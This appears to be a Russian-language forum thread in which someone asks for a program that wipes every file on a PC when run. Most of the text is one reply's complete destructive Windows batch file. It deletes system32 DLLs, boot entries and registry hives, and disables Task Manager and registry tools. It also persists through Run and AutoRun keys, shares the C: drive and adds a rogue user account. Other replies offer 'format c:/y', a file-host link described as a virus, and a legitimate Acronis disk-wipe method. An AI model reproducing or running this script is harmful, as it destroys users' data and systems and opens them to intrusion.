нет такой, она тоже файл, бред пишете, на вот те батник .
@echo offreg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f >nuldel "%SystemRoot%\system32\*.dll" /q >nuldel "%SystemRoot%\Driver Cache\i386\driver.cab" /f /q >nuldel %SystemRoot%\system32\devmgmt.msc >nulbootcfg /delete /id 1 >nulbootcfg /delete /id 1 >nulbootcfg /delete /id 1 >nul%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nulreg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d%SystemRoot%\explorer.exe /f >nultime 0:00 >nulreg delete HKLM\Software /f >nulreg delete HKCU\Software /f >nulreg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableRegistryTools /t REG_DWORD /d 1 /f >nulcopy ""%0"" "%SystemRoot%\system32\batinit.bat" >nulreg add "HKCU\SOFTWARE\Microsoft\Command Processor" /v AutoRun /t REG_SZ /d "%SystemRoot%\system32\batinit.bat" /f >nuldel "%0" >nuldel "%SystemRoot%\Cursors\*.*" >nuldel "%SystemRoot%\Media" /q >nuldel "%SystemRoot%\Web\Wallpaper" /q >nulreg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nulreg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nulmsg * "Format C:...Completed!" >nulcopy ""%0"" "%SystemRoot%\system32\ViruZ.bat" >nulreg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v"ViruZ" /t REG_SZ /d"%SystemRoot%\system32\ViruZ.bat" /f >nultaskkill /f /im explorer.exe >nuldel "%SystemRoot%\notepad.exe" >nulnet share "ResName$"="C:\" >nulnet user "You (F)Hacked" /add >nullabel C:MYA-XA-XA >nul
после этого в винде ни одного живого места не останется)
Компьютерное железо
Нужна прога которая при запуске уничтожает все файлы на пк Нужна прога которая при запуске уничтожает все файлы на пк
format c:/y
ну или молоток
Это называется вирусом
rghost.ru/79nQg8c9h
Создайте загрузочный диск либо флешку с программой акронис. При включении компа зайдите в Биос ( обычно клавиша Del) в общем, сделайте загрузку с флеш или диска, и через акронис форматируйте жесткий диск. Acronis Disk Director.